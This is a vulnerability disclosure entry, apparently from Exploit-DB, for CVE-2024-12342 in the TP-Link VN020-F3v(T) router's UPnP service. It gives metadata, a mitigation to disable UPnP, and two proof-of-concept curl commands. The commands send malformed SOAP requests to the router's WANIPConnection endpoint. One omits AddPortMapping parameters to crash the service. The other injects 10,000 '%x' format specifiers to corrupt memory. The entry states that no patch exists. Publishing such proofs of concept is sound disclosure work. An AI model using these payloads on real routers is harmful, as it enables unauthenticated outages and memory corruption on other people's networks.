TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)

vendor:

VN020-F3v(T) Router

by:

Mohamed Maatallah

6.1

CVSS

HIGH

Denial of Service (DoS)

119

CWE

Product Name: VN020-F3v(T) Router

Affected Version From: TT_V6.2.1021 (VN020-F3v(T))

Affected Version To: TT_V6.2.1021 (VN020-F3v(T))

Patch Exists: NO

Related CWE: CVE-2024-12342

CPE: h:tp-link:vn020-f3v:tt_v6.2.1021

Metasploit:

Other Scripts:

Platforms Tested: VN020-F3v(T) Router (Hardware Version 1.0)

2024

TP-Link VN020 F3v(T) TT_V6.2.1021 – Denial Of Service (DOS)

Two critical vulnerabilities found in TP-Link VN020-F3v(T) router's UPnP implementation affecting the WANIPConnection service. These vulnerabilities enable unauthenticated attackers to trigger denial of service and potential memory corruption via malformed SOAP requests.

Mitigation:

To mitigate these vulnerabilities, users are advised to disable UPnP on the affected router or restrict access to the WANIPConnection service.

Source

Exploit-DB raw data:

# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342


Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.

Proof of Concept 1 (Missing Parameters DoS):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:AddPortMapping>
<NewPortMappingDescription>hello</NewPortMappingDescription>
</u:AddPortMapping></s:Body></s:Envelope>'

Proof of Concept 2 (Memory Corruption):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
     -H "Content-Type: text/xml" \
     -H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
     -d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:SetConnectionType
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewConnectionType>'"$(perl -e 'print "%x" x
10000;')"'</NewConnectionType>
    </u:SetConnectionType>
  </s:Body>
</s:Envelope>'